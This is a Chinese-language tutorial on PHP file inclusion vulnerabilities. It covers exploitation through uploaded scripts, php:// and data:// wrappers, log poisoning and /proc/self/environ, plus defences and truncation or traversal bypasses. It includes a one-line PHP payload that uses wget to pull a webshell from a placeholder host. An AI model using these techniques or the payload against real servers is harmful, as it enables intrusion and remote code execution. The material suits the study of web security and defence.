文件包含漏洞（file inclusion）

文件包含漏洞原理：（php）

　　是指当服务器开启allow_url_include选项的时候，通过php某些特性函数、如include()、include_once()、require()、require_once()，使用url动态的去包含文件，此时如果对包含的文件没有进行过滤，就可能导致任意文件读取和任意命令执行。

　　文件包含漏洞分为本地文件包含和远程文件包含

　　远程文件包含是因为allow_url_fopen=on开启，导致本地服务器可以包含远程服务器上的一个文件，如果对这个文件没有进行审查，可能会导致意想不到的结果

文件包含的利用方式：

　　1.包含上传文件：我们可以在上传的文件中写入脚本、在知道路径的情况下可以连接拿shell

　　2.使用一些php伪协议：（php://input、data、php：//filter）

　　　　①php://input协议和data协议

　　　　　　php://input协议和data协议的使用前提是allow_url_include需要开启。

　　　　　　Ⅰ：php://input默认接收post传来的参数，我们可以使用input上传我们需要执行的语句(一句话，文件，命令)

　　　　　　　　我们可以使用hackbar插件对post进行构造　　

　　　　　　　　条件：

　　　　　　　　　　php <5.0 ，allow_url_include=Off 情况下也可以用

　　　　　　　　　　php > 5.0，只有在allow_url_fopen=On 时才能使用

　　　　　　　　　Ⅱ：data：//协议、主要是使用文字和图片命令，直接在url中进行构造

　　　　　　　　　　文字命令和php://input中的一句话类似，图片命令主要是图片马

　　　　②php://filter：我们可以使用这个协议查看源码，不过源码是以base64加密传输过来的

　　3.包含日志文件：

　　　　我们在url中输入的信息一般都会保存到日志文件中，如果我们在url中输入脚本代码，那么这个脚本代码也会保存到日志文件中，如果此时我们知道这个脚本保存的日志文件的路径，那么我们可以直接连接执行。这个方法在凌晨的时候是最方便的，因为日志文件是一天一保存，凌晨时候，日志文件最少，我们利用起来更加方便。

　　4.包含/proc/self/environ文件

　　　　找到文件包含漏洞，尝试访问/proc/self/environ文件，访问成功的话，在user-agent头中添加脚本代码

<?system('wget http://www.yourweb.com/oneword.txt -O shell.php');?>

防御方法：

　　1.在不必须的情况下，关闭allow_url_include选项

　　2.使用白名单和黑名单对可包含的文件进行限制

　　3.尽量不使用动态包含

　　4.在服务端和客户端都进行过滤

绕过方法：

　　1.00%进行截断，00%可以截断file变量后面的字符串

　　2.使用./构造超长字符串进行截断

　　3.使用../进行目录遍历

　　4.使用？进行截断，使用原理和%00相同